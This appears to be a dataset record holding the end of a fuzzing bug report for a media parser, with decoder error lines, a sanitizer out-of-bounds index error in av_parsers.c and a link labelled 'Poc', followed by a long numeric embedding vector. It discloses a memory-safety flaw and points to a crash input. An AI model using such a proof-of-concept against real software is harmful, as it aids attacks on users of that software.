! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] corrupted exp-golomb code, 32 leading zeros, max 31 allowed ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! [Core] exp-golomb read failed, not enough bits in bitstream ! media_tools/av_parsers.c:5684:21: runtime error: index 128 out of bounds for type 'AVC_SPS [32]' ``` # Poc https://drive.google.com/file/d/1wf2-Yk4cijCPcQd33P9PQ8ADokG_sG4i/view?usp=sharing --- end body ---
3,706
[ -0.030896015465259552, 0.0335565060377121, -0.014246495440602303, -0.0027767077554017305, 0.0459149107336998, 0.02199910581111908, -0.03698939457535744, 0.04265366494655609, -0.0157626885920763, 0.036360032856464386, -0.019410135224461555, -0.014961681328713894, 0.034872446209192276, 0.031239302828907967, 0.01912406086921692, 0.012758909724652767, -0.0226999893784523, 0.013788776472210884, -0.008510707877576351, -0.003790483344346285, 0.03026665188372135, -0.03727547079324722, -0.011385753750801086, 0.06425226479768753, -0.019967980682849884, 0.01514762919396162, -0.014318014495074749, 0.005349587649106979, 0.009519119746983051, 0.015304970555007458, 0.023858588188886642, 0.027248568832874298, -0.0021527083590626717, 0.035330165177583694, 0.041881263256073, -0.005181519314646721, 0.04654427245259285, 0.08015799522399902, 0.015705473721027374, 0.005399650894105434, -0.016806859523057938, -0.06682693213224411, -0.028221221640706062, 0.0024334187619388103, -0.002991263521835208, 0.02388719655573368, 0.017665082588791847, -0.02666211687028408, -0.05083538591861725, -0.009991141967475414, 0.018308749422430992, 0.002993051428347826, -0.018680645152926445, -0.043654926121234894, -0.003965703770518303, -0.03344207629561424, 0.011800561100244522, -0.0012935918057337403, 0.012708846479654312, 0.03670332208275795, 0.009590637870132923, 0.0214412622153759, 0.005918160080909729, 0.014604087918996811, 0.01763647422194481, 0.0001671746140345931, 0.00994107872247696, 0.023515300825238228, -0.024230485782027245, 0.021612906828522682, -0.008989881724119186, -0.042996954172849655, 0.020096713677048683, 0.029322605580091476, 0.012229672633111477, -0.022042017430067062, 0.046000733971595764, 0.024230485782027245, -0.016306230798363686, 0.03118208795785904, -0.047488316893577576, 0.020468609407544136, -0.029379820451140404, 0.029780324548482895, 0.03976431488990784, -0.005610630381852388, -0.04499947279691696, -0.08267544955015182, -0.024058841168880463, -0.04179544374346733, 0.0029662318993359804, 0.01647787354886532, 0.012265431694686413, -0.0062221139669418335, 0.014017635956406593, 0.03075297735631466, -0.025131618604063988, -0.00005833231989527121, -0.04273948818445206, -0.023200618103146553, -0.03779040277004242, 0.0017486285651102662, 0.009469056501984596, 0.01440383680164814, 0.0199250690639019, -0.0032219106797128916, -0.015505222603678703, -0.030638547614216805, 0.002542484551668167, 0.12415620684623718, 0.021827463060617447, 0.005331708118319511, 0.0049669635482132435, -0.0022564104292541742, 0.016063066199421883, 0.01025576051324606, -0.024373522028326988, -0.013638587668538094, -0.05383916571736336, -0.007466536946594715, 0.012715999037027359, -0.023071885108947754, -0.008460644632577896, 0.001306107616983354, -0.017679385840892792, 0.04700199142098427, -0.0045342762023210526, -0.0027713438030332327, -0.03962127864360809, -0.02507440373301506, -0.030838800594210625, -0.02580389380455017, -0.005599902477115393, -0.02706262096762657, 0.010649112053215504, 0.0025710919871926308, -0.019967980682849884, 0.04142354428768158, 0.01099955290555954, 0.039192166179418564, -0.039192166179418564, -0.012909098528325558, 0.050863996148109436, 0.0031271486077457666, -0.01674964465200901, -0.02517453022301197, -0.007112519815564156, 0.012193913571536541, -0.0570145882666111, -0.011063920333981514, -0.0013695802772417665, -0.009690763428807259, 0.017693689092993736, 0.011485879309475422, 0.06985931843519211, 0.0074593848548829556, 0.013502703048288822, 0.03990735113620758, 0.006840749643743038, -0.016535088419914246, -0.009955382905900478, -0.02860742062330246, 0.006994514260441065, -0.015190540812909603, -0.009190133772790432, -0.045113902539014816, 0.03006639890372753, -0.011342842131853104, -0.017951156944036484, 0.021283920854330063, -0.00022126051771920174, -0.015519525855779648, 0.029780324548482895, 0.024559471756219864, -0.05486903339624405, -0.03673192858695984, 0.0016529725398868322, 0.05973229557275772, -0.037847619503736496, -0.00017097404634114355, -0.04445593059062958, -0.005263765342533588, -0.033384859561920166, -0.0008059247047640383, 0.011128286831080914, -0.02681945636868477, 0.032784104347229004, -0.04820350557565689, 0.015333577990531921, -0.013595676980912685, -0.0012050876393914223, 0.0011729042744264007, -0.012043723836541176, -0.013130806386470795, 0.019667601212859154, -0.01024145632982254, -0.026533382013440132, -0.030238043516874313, 0.005542687606066465, 0.012115242891013622, 0.0031539681367576122, -0.0263617392629385, -0.010863668285310268, 0.0036331424489617348, -0.03590231388807297, 0.009540574625134468, -0.0010969158029183745, 0.04886147379875183, 0.007702548056840897, -0.00911861564964056, -0.053696129471063614, -0.04602934047579765, 0.005646389909088612, 0.012859035283327103, -0.02015392854809761, 0.011235564947128296, -0.03438612073659897, -0.016148889437317848, -0.010670567862689495, -0.023744158446788788, 0.052609048783779144, -0.013323905877768993, 0.016377748921513557, -0.030810192227363586, -0.03801926225423813, -0.031496770679950714, -0.019538868218660355, 0.002640822436660528, -0.011893535032868385, 0.014117762446403503, 0.022685684263706207, 0.0004465439706109464, -0.0009976838482543826, -0.011493030935525894, 0.014875859022140503, -0.0009878500131890178, -0.00742362579330802, 0.00719476630911231, -0.020425697788596153, 0.022413915023207664, -0.01207233127206564, 0.02315770648419857, -0.013195172883570194, -0.0031325125601142645, 0.014790036715567112, 0.06442391127347946, -0.007277012802660465, -0.01072063110768795, -0.018451785668730736, 0.02381567843258381, -0.016535088419914246, 0.00691941985860467, 0.012751758098602295, 0.012065179646015167, -0.005785850808024406, 0.00408728513866663, 0.027305783703923225, 0.003858425887301564, -0.01985355094075203, -0.0069837868213653564, 0.023729855194687843, -0.03922077268362045, -0.02527465671300888, -0.004809622652828693, 0.014732821844518185, -0.017135845497250557, -0.005539111793041229, -0.007909951731562614, 0.009368930011987686, -0.040679752826690674, 0.012980617582798004, -0.013416880741715431, -0.034901052713394165, -0.05403941869735718, -0.018580520525574684, -0.00478101521730423, -0.015619651414453983, 0.012351254001259804, 0.015047503635287285, 0.0003667560813482851, -0.017035719007253647, 0.01662091165781021, -0.028335649520158768, 0.04459897056221962, 0.010041204281151295, -0.0006901540327817202, -0.013517006300389767, 0.0009503027540631592, -0.0034740136470645666, 0.00007827929221093655, 0.016377748921513557, 0.015734082087874413, -0.061162665486335754, 0.008911211974918842, 0.004820350557565689, 0.014904466457664967, 0.004123044665902853, 0.004094437230378389, -0.016105977818369865, 0.012530050240457058, -0.04605794697999954, 0.03026665188372135, 0.0050921207293868065, -0.0011308870743960142, -0.041480761021375656, -0.00471664872020483, -0.038505587726831436, 0.004777439404278994, -0.006597586441785097, -0.012344102375209332, 0.02774919755756855, -0.03761876001954079, -0.01906684599816799, -0.00619350653141737, -0.015848511829972267, -0.0009306351421400905, 0.0007768702926114202, -0.005113576538860798, -0.02444504201412201, 0.005621358286589384, -0.006347271613776684, 0.015805600211024284, -0.03627420961856842, 0.02986614778637886, 0.006282904651015997, -0.0052280062809586525, -0.007774066645652056, 0.007387866266071796, -0.07746889442205429, 0.037675973027944565, 0.005860945209860802, 0.002367264125496149, 0.021684424951672554, -0.03464358672499657, 0.014382380992174149, -0.004351903684437275, -0.008911211974918842, 0.013867447152733803, 0.010913731530308723, -0.011614613234996796, -0.017064327374100685, 0.014282254502177238, 0.037018001079559326, 0.007330651395022869, -0.014246495440602303, -0.0010075175669044256, 0.003954975865781307, -0.002288593677803874, 0.02136974409222603, -0.00025880776229314506, 0.0009851680370047688, 0.03375675529241562, 0.03221195563673973, 0.04445593059062958, 0.018852289766073227, -0.012279735878109932, -0.005868097301572561, -0.0022278029937297106, 0.0028571661096066236, -0.005857369396835566, -0.001938152825459838, -0.026275916025042534, -0.010234304703772068, 0.01985355094075203, 0.024859849363565445, 0.0007648015161976218, 0.0032362143974751234, 0.00796001497656107, -0.002226014854386449, -0.014382380992174149, -0.03261246159672737, 0.03601674363017082, -0.04597212374210358, 0.017364704981446266, 0.006747775245457888, -0.015018896199762821, 0.0348152294754982, -0.009025641717016697, -0.04059392958879471, 0.01599154807627201, -0.054096631705760956, 0.02633313089609146, 0.04073696583509445, -0.09097159653902054, -0.011278475634753704, 0.028621723875403404, -0.016792556270956993, 0.03558763116598129, -0.0200538020581007, -0.017994068562984467, -0.03521573543548584, 0.06739908456802368, -0.015204844065010548, -0.06928717344999313, -0.02209923230111599, 0.0046022189781069756, -0.041909873485565186, -0.0411088652908802, -0.0021562844049185514, -0.043626315891742706, 0.037876226007938385, 0.005860945209860802, 0.002390507608652115, 0.01407485082745552, -0.0028875614516437054, 0.03976431488990784, 0.020139623433351517, -0.014604087918996811, 0.020125320181250572, -0.001668170210905373, 0.028063880279660225, 0.004745256155729294, 0.0034918934106826782, -0.00036273314617574215, 0.017193060368299484, 0.015433703549206257, 0.023629730567336082, 0.011307083070278168, -0.04528554901480675, 0.039993174374103546, -0.010692023672163486, 0.013588525354862213, 0.005589175038039684, 0.014539721421897411, 0.04211012274026871, 0.03435751423239708, -0.021956196054816246, 0.02229948528110981, 0.02807818353176117, -0.006164899095892906, 0.016492178663611412, -0.001315047382377088, -0.022213662043213844, -0.012043723836541176, -0.01088512409478426, -0.04677313193678856, -0.048575401306152344, -0.05229436606168747, 0.00918298214673996, -0.015705473721027374, -0.03922077268362045, 0.02045430615544319, 0.007058881223201752, -0.01988215744495392, 0.02606135979294777, -0.050692349672317505, -0.009597789496183395, -0.0317828431725502, 0.012694543227553368, -0.020768987014889717, -0.004137348383665085, 0.04030785709619522, -0.00918298214673996, -0.005360315553843975, -0.0003584867517929524, 0.016692429780960083, -0.0200538020581007, -0.022385306656360626, 0.03315600007772446, 0.010577593930065632, -0.020654557272791862, 0.022742899134755135, 0.001243528793565929, -0.008145962841808796, 0.040021780878305435, 0.03590231388807297, -0.031124873086810112, -0.02111227624118328, 0.009197285398840904, -0.013373969122767448, 0.0009096266003325582, 0.005503352731466293, 0.005889552645385265, 0.021326832473278046, -0.013373969122767448, 0.031239302828907967, -0.0039907353930175304, -0.010613352991640568, -0.003872729605063796, -0.05157918110489845, -0.009998293593525887, -0.0057894266210496426, -0.006965906824916601, 0.023300744593143463, -0.0009565606596879661, -0.011807712726294994, -0.025889715179800987, -0.015548133291304111, 0.01308074314147234, -0.014675606973469257, 0.016392052173614502, 0.004469909705221653, -0.0007589906454086304, -0.02028266154229641, 0.007766914553940296, 0.0036689017433673143, -0.033184606581926346, 0.013052135705947876, 0.03198309615254402, 0.010363038629293442, -0.023629730567336082, -0.016206104308366776, 0.0003712259931489825, 0.01338112074881792, 0.03776179626584053, -0.030638547614216805, -0.016392052173614502, 0.040479499846696854, -0.018222928047180176, -0.030552726238965988, -0.008031533099710941, -0.025231745094060898, 0.0004425210354384035, -0.03947824239730835, -0.012179609388113022, -0.03796204924583435, 0.017336096614599228, -0.013259539380669594, 0.017135845497250557, -0.022127840667963028, -0.027935147285461426, -0.027205657213926315, -0.023744158446788788, -0.0032934292685240507, 0.028192613273859024, 0.007155430968850851, 0.009233045391738415, -0.00996253453195095, 0.038991913199424744, 0.009490512311458588, -0.010963793843984604, 0.0031110569834709167, -0.0235868189483881, 0.02322922646999359, -0.01642065867781639, 0.004441302269697189, 0.0024155389983206987, 0.02782071754336357, 0.020397091284394264, -0.00812450796365738, -0.021384047344326973, 0.04253923520445824, -0.03163980692625046, 0.026004144921898842, -0.0053138285875320435, 0.014718517661094666, 0.003089601406827569, 0.0042517781257629395, -0.005531960166990757, -0.023744158446788788, -0.006365151144564152, -0.00836051907390356, 0.006143443752080202, 0.015934333205223083, 0.01253720186650753, 0.010384493507444859, -0.012000813148915768, 0.011907839216291904, 0.007995774038136005, 0.013044984079897404, -0.006522492039948702, 0.005009874701499939, -0.004373359493911266, -0.0220706257969141, 0.00903279334306717, -0.014067699201405048, -0.008446341380476952, 0.02051152102649212, -0.03561623767018318, 0.005102848634123802, 0.0018344508716836572, -0.005674997344613075, 0.023114796727895737, -0.003080661641433835, -0.015490918420255184, 0.0157626885920763, 0.01124986819922924, -0.002265350194647908, -0.012136698700487614, -0.02189898118376732, -0.0027534642722457647, -0.02381567843258381, -0.025975538417696953, -0.00789564847946167, 0.020697468891739845, -0.026104271411895752, 0.007652485277503729, 0.007645333185791969, -0.038991913199424744, -0.02807818353176117, -0.009233045391738415, -0.002304685302078724, -0.019410135224461555, -0.034014225006103516, 0.0023011094890534878, 0.003595595248043537, -0.00402291864156723, 0.014639847911894321, 0.014875859022140503, 0.007638181559741497, -0.008610833436250687, 0.03753293678164482, -0.007602422032505274, -0.017822423949837685, -0.012737453915178776, 0.005056361667811871, 0.0036385064013302326, 0.015619651414453983, -0.012401317246258259, 0.035816490650177, 0.003962127957493067, 0.01725027523934841, 0.040365070104599, -0.010434556752443314, 0.013788776472210884, 0.014790036715567112, 0.026933886110782623, 0.009697915986180305, -0.008331911638379097, 0.02969450317323208, 0.03012361377477646, -0.047059208154678345, 0.028435776010155678, -0.04228176921606064, 0.009418993256986141, 0.03515851870179176, 0.012437076307833195, -0.032097525894641876, -0.014096306636929512, -0.02477402612566948, -0.029322605580091476, 0.03118208795785904, 0.008725263178348541, -0.030037792399525642, -0.044913649559020996, -0.020640254020690918, 0.02847868762910366, 0.0005399650544859469, -0.011750497855246067, -0.0068479012697935104, -0.01876646839082241, 0.003937096334993839, -0.028764761984348297, 0.0014589785132557154, -0.025946930050849915, 0.019596083089709282, -0.005081393290311098, -0.007480840664356947, 0.016592303290963173, 0.03315600007772446, -0.01849469728767872, -0.002562152221798897, 0.013888902962207794, 0.023114796727895737, 0.0007500508218072355, -0.031897272914648056, 0.05160778760910034, 0.05180804058909416, 0.004176683258265257, -0.018723556771874428, -0.03292714059352875, -0.014382380992174149, -0.01430371031165123, -0.006214962340891361, 0.001153236604295671, -0.0034704378340393305, -0.02078329212963581, -0.0013373969122767448, 0.013431183993816376, 0.0017325369408354163, 0.008546466939151287, -0.00873956736177206, 0.008167418651282787, 0.014761429280042648, -0.018022675067186356, -0.01579129695892334, 0.005889552645385265, 0.020440002903342247, -0.007119671907275915, 0.0014437807258218527, -0.0037296924274414778, 0.0059217363595962524, 0.0031199967488646507, 0.01291625015437603, -0.04125190153717995, 0.012093787081539631, 0.003009143052622676, -0.0004997358773835003, -0.029408428817987442, -0.013431183993816376, 0.034042831510305405, -0.005106424447149038, 0.013280995190143585, 0.04459897056221962, 0.018251534551382065, -0.024831240996718407, 0.018880898132920265, -0.00924734864383936, 0.0005377301131375134, -0.016635214909911156, -0.03687496483325958, 0.007688244339078665, -0.02461668662726879, -0.028063880279660225, 0.007788370363414288, 0.027262872084975243, -0.011078223586082458, 0.010863668285310268, 0.009683611802756786, 0.00017231500532943755, -0.001954244449734688, 0.015190540812909603, -0.014096306636929512, 0.005217278376221657, 0.029923362657427788, -0.006629769690334797, 0.008467796258628368, -0.0016109553398564458, -0.0185376089066267, -0.0033899794798344374, 0.022013410925865173, -0.03799065575003624, -0.028092486783862114, -0.028793368488550186, -0.01179340947419405, 0.011736194603145123, 0.0049848430790007114, 0.0215699952095747, -0.0009905319893732667, 0.007952863350510597, -0.023772766813635826, -0.038705840706825256, 0.01869495026767254, 0.010413100942969322, -0.030695762485265732, 0.0009172254358418286, -0.0063579995185136795, -0.00939753744751215, -0.0025156650226563215, 0.017750903964042664, 0.001222967286594212, -0.014382380992174149, 0.007566662970930338, -0.04860400781035423, -0.007952863350510597, -0.02058303914964199, 0.012894795276224613, -0.005002722609788179, -0.034014225006103516, 0.03367093577980995, 0.015548133291304111, 0.03292714059352875, 0.014103458262979984, -0.020440002903342247, -0.022685684263706207, 0.0036689017433673143, 0.019810639321804047, 0.00035111140459775925, -0.02451656013727188, -0.02484554424881935, 0.006912268232554197, 0.01348124723881483, -0.01922418735921383, -0.0012140274047851562, -0.007366410922259092, -0.015905726701021194, 0.026147183030843735, -0.008761022239923477, 0.019081149250268936, -0.0028535902965813875, 0.006050469353795052, -0.004963387735188007, -0.019910765811800957, -0.015848511829972267, 0.006719167809933424, -0.029923362657427788, 0.010334431193768978, 0.02368694543838501, 0.01793685369193554, 0.006737047806382179, -0.05486903339624405, 0.010713479481637478, -0.03309878706932068, 0.03495826944708824, -0.012894795276224613, -0.015419400297105312, 0.020010890439152718, -0.027691982686519623, -0.011278475634753704, 0.007924255914986134, 0.0054890490137040615, -0.01773660071194172, 0.022185055539011955, -0.02302897348999977, -0.01965329796075821, -0.017879638820886612, -0.003693933133035898, 0.0226999893784523, -0.01747913472354412, -0.02048291265964508, 0.010384493507444859, 0.009833800606429577, -0.03315600007772446, -0.028979318216443062, -0.000885042070876807, -0.014947377145290375, -0.008331911638379097, 0.020897721871733665, -0.016492178663611412, 0.024559471756219864, -0.0019810639787465334, -0.006872932892292738, 0.00245308643206954, -0.012022268958389759, 0.009454752318561077, 0.012580113485455513, 0.017092933878302574, -0.036417245864868164, -0.01569117046892643, 0.01245137955993414, -0.008997034281492233, 0.020440002903342247, 0.0005529277841560543, -0.04923337325453758, 0.027563249692320824, -0.02401592954993248, 0.00905424915254116, 0.022356700152158737, 0.008432037197053432, -0.00036474462831392884, -0.006347271613776684, -0.014425291679799557, 0.004065829794853926, 0.036188386380672455, -0.0030609939713031054, 0.030466903001070023, 0.006872932892292738, 0.006322239991277456, -0.02444504201412201, 0.02643325738608837, -0.01126417238265276, -0.007019545882940292, -0.00281604309566319, -0.020096713677048683, -0.008210329338908195, -0.02926539070904255, 0.0010870819678530097, -0.0023404445964843035, 0.034872446209192276, 0.012522898614406586, 0.014253647066652775, 0.02774919755756855, 0.0036385064013302326, 0.02840716950595379, -0.015734082087874413, 0.00896842684596777, -0.022585559636354446, -0.015004592016339302, 0.028006665408611298, -0.009440449066460133, 0.023644033819437027, 0.03244081512093544, -0.01962469145655632, -0.010441708378493786, 0.014689910225570202, 0.022256573662161827, 0.0037976352032274008, -0.05129310488700867, -0.008181722834706306, -0.006300784647464752, -0.03547320142388344, -0.008410581387579441, 0.006082653068006039, 0.0043769353069365025, -0.017722297459840775, 0.008303304202854633, 0.006990938447415829, -0.006232841871678829, -0.0029465644620358944, 0.05544118210673332, -0.0026819456834346056, 0.029150962829589844, 0.002367264125496149, 0.012816124595701694, 0.017622170969843864, -0.024073144420981407, 0.0027802838012576103, -0.03993596136569977, -0.023114796727895737, 0.004301840905100107, 0.01301637664437294, -0.009318867698311806, -0.02659059688448906, -0.012329798191785812, 0.013095047324895859, 0.02721996046602726, -0.01162891648709774, -0.0251030120998621, -0.018294446170330048, -0.03132512420415878, -0.004037222359329462, -0.01019139401614666, -0.020397091284394264, -0.019538868218660355, -0.012465683743357658, -0.012630176730453968, 0.04697338491678238, 0.005628509912639856, -0.022185055539011955, -0.011736194603145123, 0.01674964465200901, -0.009655004367232323, -0.018079889938235283, -0.03332764655351639, -0.007874192669987679, 0.002581819659098983, -0.03286992758512497, -0.0024298427160829306, 0.0034096469171345234, 0.05458296090364456, 0.00528522115200758, -0.005721484310925007, -0.022714292630553246, 0.038534194231033325, -0.00032228048075921834, -0.027606161311268806, -0.025260353460907936, -0.018709253519773483, 0.0024423585273325443, 0.002814254956319928, 0.006740623619407415, -0.011335690505802631, -0.0042517781257629395, -0.007062457036226988, 0.01697850413620472, -0.012730302289128304, -0.042968347668647766, 0.0023386566899716854, 0.004208866972476244, -0.04502807930111885, -0.0206831656396389, -0.0017155512468889356, 0.0012855459935963154, -0.008281848393380642, -0.015548133291304111, 0.006147019565105438, 0.006064773071557283, -0.017092933878302574, -0.022885937243700027, 0.00030350685119628906, -0.0271198358386755, 0.0006262343376874924, -0.019796336069703102, -0.007126823533326387, -0.014918769709765911, 0.008310455828905106, -0.019410135224461555, -0.037704579532146454, -0.008861148729920387, 0.018823683261871338, 0.006365151144564152, 0.027391605079174042, -0.020540127530694008, -0.018509000539779663, 0.004015766549855471, 0.007373562548309565, -0.013202324509620667, 0.004537852015346289, -0.008310455828905106, -0.010291519574820995, 0.005299524869769812, 0.007330651395022869, 0.00863944087177515, 0.0205544326454401, 0.01474712509661913, 0.03933520242571831, 0.0014536145608872175, -0.047087814658880234, -0.002383355749770999, -0.011764802038669586, -0.0031074811704456806, -0.013424032367765903, 0.034071438014507294, -0.0201825350522995, -0.010563289746642113, -0.018909504637122154, -0.0010101995430886745, 0.04308277741074562, -0.03012361377477646, -0.0006847901386208832, 0.028950709849596024, 0.017679385840892792, 0.007909951731562614, -0.043454673141241074, 0.015505222603678703, 0.010856516659259796, 0.01027721632272005, -0.012308343313634396, -0.008396278135478497, -0.04582908749580383, -0.05529814586043358, -0.006447397638112307, 0.0032987932208925486, 0.01849469728767872, -0.008281848393380642, 0.005256613716483116, -0.002454874338582158, 0.005982527043670416, -0.03461498022079468, -0.010270063765347004, -0.016806859523057938, 0.012151001952588558, 0.001231907051987946, 0.0003640741342678666, 0.014539721421897411, 0.0040801335126161575, -0.01599154807627201, 0.0019095453899353743, 0.026948191225528717, 0.0264904722571373, -0.03610256686806679, -0.004301840905100107, -0.02782071754336357, -0.005006298888474703, 0.005721484310925007, 0.023729855194687843, 0.0008819131762720644, 0.004612946417182684, 0.00562493409961462, 0.016663823276758194, 0.015319273807108402, 0.002826770767569542, 0.005903856363147497, -0.0008095006342045963, 0.004605794791132212, -0.009655004367232323, 0.015190540812909603, -0.030638547614216805, -0.02490275911986828, 0.006590434815734625, 0.032984357327222824, 0.005907432641834021, -0.05484042689204216, -0.03143955394625664, 0.0012739242520183325, 0.011528790928423405, 0.013502703048288822, 0.016263319179415703, 0.001683367881923914, -0.015047503635287285, 0.002211711136624217, -0.014325166121125221, 0.04934779927134514, -0.011614613234996796, -0.022442521527409554, -0.016234710812568665, 0.003634930355474353, -0.007445081137120724, 0.007155430968850851, -0.003597383154556155, 0.006107684224843979, -0.028106791898608208, 0.003972855396568775, -0.04800325259566307, -0.019481653347611427, -0.033184606581926346, -0.015905726701021194, 0.004723800346255302, -0.0021366167347878218, -0.009919622913002968, 0.00021455565001815557, -0.009747978299856186, -0.006948027294129133, -0.027148442342877388, 0.020225446671247482, -0.025460604578256607, -0.004820350557565689, -0.016592303290963173, -0.007445081137120724, -0.018380267545580864, -0.013359665870666504, -0.02111227624118328, -0.0069837868213653564, 0.008989881724119186, -0.055155105888843536, 0.004015766549855471, 0.004523548297584057, -0.02847868762910366, 0.02623300440609455, -0.021097972989082336, -0.014975984580814838, -0.011392905376851559, -0.006526067852973938, -0.016306230798363686, -0.024073144420981407, 0.010012597776949406, 0.026848064735531807, 0.07729724794626236, 0.01516193337738514, 0.004888292867690325, -0.02252834476530552, 0.007874192669987679, 0.01200796477496624, 0.018122801557183266, 0.014067699201405048, 0.013817383907735348, 0.022356700152158737, 0.020540127530694008, -0.004008614923804998, 0.0007741883164271712, -0.004219594411551952, 0.003184363478794694, -0.003254094161093235, -0.022127840667963028, -0.01863773539662361, 0.012730302289128304, 0.011850624345242977, 0.016592303290963173, 0.007373562548309565, 0.013424032367765903, -0.01154309418052435, 0.025231745094060898, -0.03289853408932686, -0.0010173514019697905, -0.017264578491449356, -0.024402130395174026, -0.0059431917034089565, 0.006021861918270588, -0.02272859588265419, -0.02504579722881317, 0.008396278135478497, 0.025560731068253517, 0.0009172254358418286, 0.01816571317613125, -0.013602828606963158, -0.007105368189513683, -0.019267097115516663, -0.0036528101190924644, 0.0011881019454449415, -0.008918363600969315, 0.014904466457664967, -0.0005842171958647668, -0.031897272914648056, 0.0174076147377491, 0.005578447133302689, -0.01750774122774601, -0.00478101521730423, -0.006007558200508356, -0.03524434193968773, 0.024688204750418663, 0.03750433027744293, -0.0031217848882079124, 0.012501442804932594, -0.013002072460949421, 0.0021366167347878218, -0.005689301062375307, -0.002547848504036665, -0.007981470786035061, 0.001855906448327005, 0.02121240273118019, 0.012136698700487614, -0.007845585234463215, 0.000082190461398568, -0.006604738533496857, 0.02101214975118637, 0.008503556251525879, 0.011500183492898941, 0.02285732887685299, -0.005331708118319511, -0.000657523691188544, 0.006722744088619947, 0.004770287312567234, 0.03138234093785286, -0.012100938707590103, 0.0028071030974388123, -0.02338656596839428, -0.00013577350182458758, 0.015204844065010548, 0.009004185907542706, -0.006393758580088615, 0.02847868762910366, -0.012115242891013622, 0.020010890439152718, 0.002113373251631856, 0.013788776472210884, 0.002032914897426963, -0.0026765817310661077, 0.011042464524507523, 0.0008278272580355406, 0.02877906523644924, 0.029751718044281006, -0.00582161033526063, 0.019338617101311684, -0.010577593930065632, -0.02338656596839428, -0.0234580859541893, -0.012959161773324013, 0.018609127029776573, 0.003078873734921217, 0.028664635494351387, 0.006322239991277456, -0.0013731562066823244, 0.002581819659098983, 0.007745459210127592, 0.024659596383571625, 0.012272583320736885, -0.018623430281877518, -0.036617498844861984, -0.014267951250076294, -0.004888292867690325, -0.014010484330356121, -0.009125767275691032, 0.007602422032505274, -0.005063513293862343, 0.00964785274118185, 0.0028321347199380398, -0.029079442843794823, -0.011500183492898941, -0.003404283197596669, 0.02814970165491104, -0.020540127530694008, -0.0023565362207591534, 0.0009163314243778586, 0.006265025120228529, -0.015633955597877502, 0.03796204924583435, 0.025760982185602188, 0.028364257887005806, 0.00650818832218647, -0.0021598602179437876, 0.006458125077188015, 0.025746678933501244, -0.025188833475112915, 0.020397091284394264, 0.006901540327817202, 0.0076810927130281925, -0.021755943074822426, 0.00031021173344925046, 0.02966589480638504, 0.009154374711215496, 0.00857507437467575, -0.005042057950049639, 0.011493030935525894, 0.012758909724652767, 0.002803527284413576, 0.02124100923538208, 0.0028714698273688555, 0.005034905858337879, -0.008761022239923477, 0.020497217774391174, 0.04751692712306976, 0.00773830758407712, 0.0028696819208562374, 0.010813605040311813, -0.019410135224461555, -0.0002905441215261817, 0.0011836320627480745, 0.017536349594593048, 0.008839692920446396, 0.011578853242099285, 0.003593807341530919, -0.0046022189781069756, 0.013681499287486076, -0.017464829608798027, -0.053438663482666016, -0.027177050709724426, -0.024659596383571625, 0.014282254502177238, 0.012615872547030449, -0.009662155993282795, 0.006207810249179602, 0.006490308791399002, 0.011950749903917313, -0.03879166394472122, -0.003411435056477785, 0.01514762919396162, -0.010842212475836277, -0.0010683083673939109, 0.03172563016414642, 0.009075704030692577, 0.002186679746955633, 0.03095323033630848, -0.03307017683982849, 0.0030216588638722897, -0.0029376244638115168, -0.03515851870179176, 0.021555691957473755, 0.007931407541036606, 0.02946564368903637, -0.013795929029583931, 0.006329392082989216, -0.0234580859541893, -0.02091202512383461, 0.009154374711215496, 0.0037261166144162416, -0.013438335619866848, -0.016921289265155792, -0.005020602140575647, 0.004090861417353153, -0.009619245305657387, 0.00025120892678387463, -0.007466536946594715, -0.006518916226923466, -0.00010778069554362446, 0.004416270647197962, -0.013960421085357666, -0.003954975865781307, -0.045543015003204346, 0.01849469728767872, 0.007316347677260637, 0.009612093679606915, 0.0033095208927989006, 0.007752611301839352, 0.003525864565744996, -0.025017188861966133, -0.0008488357998430729, 0.007316347677260637, -0.032726891338825226, 0.020997846499085426, 0.010641960427165031, -0.010363038629293442, -0.02517453022301197, -0.0008448128937743604, 0.019081149250268936, -0.01586281508207321, -0.007148279342800379, 0.010434556752443314, -0.013753017410635948, -0.0015573165146633983, 0.0009556666482239962, 0.007187614683061838, 0.0012783941347151995, -0.0019202731782570481, 0.01423934381455183, -0.005882401019334793, 0.0006423260201700032, -0.008381973952054977, 0.006300784647464752, 0.0018755740020424128, -0.021455565467476845, -0.008095900528132915, -0.0004890080890618265, -0.00014113739598542452, 0.002129464875906706, 0.019467350095510483, -0.01062050461769104, 0.011407208628952503, -0.02494567073881626, 0.01642065867781639, -0.0016082734800875187, -0.008560771122574806, -0.0007160794921219349, 0.04013621062040329, -0.006118412129580975, 0.006890812423080206, 0.025131618604063988, 0.023973017930984497, 0.0074379295110702515, -0.020125320181250572, 0.0012578325113281608, 0.019596083089709282, -0.03696078807115555, 0.01750774122774601, 0.01065626461058855, -0.022843025624752045, 0.009311715140938759, -0.007409322075545788, 0.002794587519019842, 0.014646999537944794, 0.022142143920063972, 0.017564956098794937, -0.006758503150194883, 0.02298606187105179, -0.00593961589038372, -0.026776546612381935, -0.021026454865932465, 0.00132935110013932, -0.01896671950817108, 0.04574326425790787, 0.004845381714403629, -0.01484725158661604, 0.008889756165444851, -0.010792149230837822, -0.03461498022079468, -0.0011648584622889757, -0.02154138870537281, -0.013087894767522812, -0.0046880412846803665, 0.016806859523057938, -0.004151652101427317, -0.028106791898608208, 0.03295574709773064, -0.021727336570620537, -0.021598603576421738, 0.0315253771841526, -0.009390385821461678, -0.01301637664437294, 0.03344207629561424, 0.02883628010749817, 0.007917103357613087, 0.014611240476369858, -0.01164322067052126, 0.01263732835650444, -0.017851030454039574, -0.002374415984377265, 0.012801820412278175, -0.0030270228162407875, 0.0033703118097037077, -0.021498477086424828, -0.020969239994883537, -0.016892682760953903, 0.022900240495800972, -0.005417530424892902, 0.012623024173080921, -0.010992401279509068, -0.014053395949304104, 0.004909748677164316, 0.019896460697054863, -0.008560771122574806, -0.017550652846693993, -0.031496770679950714, -0.01141436118632555, -0.0059431917034089565, 0.007148279342800379, 0.022213662043213844, 0.0018308749422430992, -0.04073696583509445, 0.03206891939043999, 0.02312909997999668, 0.05163639411330223, 0.004405542742460966, 0.0035669878125190735, 0.00141427933704108, 0.0017387948464602232, 0.007344955112785101, -0.00903279334306717, -0.00939753744751215, -0.040651146322488785, 0.021155187860131264, -0.02061164751648903, -0.0032898534554988146, 0.007041001692414284, -0.007523751817643642, 0.0038298184517771006, 0.029022227972745895, 0.00956203043460846, -0.029951969161629677, -0.02252834476530552, -0.006104108411818743, 